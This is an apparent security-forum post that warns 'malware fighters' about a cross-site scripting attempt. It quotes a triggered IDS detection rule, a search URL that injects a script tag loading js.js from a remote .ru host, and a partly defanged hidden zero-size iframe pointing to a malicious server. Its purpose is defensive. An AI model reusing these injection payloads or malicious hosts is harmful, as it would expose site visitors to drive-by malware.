Hi malware fighters,
Look here how it was performed : http://www.webhostingtalk.com/showthread.php?t=626444
I give this in at Google:
=== Triggered rule ===
alert(url_content:“%3CSCRIPT”; nocase; msg:“ tags GET request cross site scripting attempt”; url_re:“/%3Cscript.*%3E/i”; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
=== Request URL ===
http://www.google.com/search?client=flock&channel=fds&q=<script+src%3Dhttp%3A%2F%2Fexport.webservicessl.ru%2Fjs.js>&ie=utf-8&oe=utf-8&aq=t
What is this js.js malware? See: http://www.google.com/safebrowsing/diagnostic?site=http%3A//export.webservicessl.ru/js.js
See: http://jsunpack.jeek.org/dec/go?report=f657a77d0501a9cb52516346fd69dfcc8da15ccb
You get this here:
^iframe src=htxp://letter.kafeira.com:8080/index.php?pid=6 width=0 height=0 frameborder=0^^/iframe>")}catch(e){}}= "error code to get an SQL" pol
Expired site now used for malicious purposes:
kafeiracom - wXw.kafeiracom
Malware folks, more and more malware…
polonus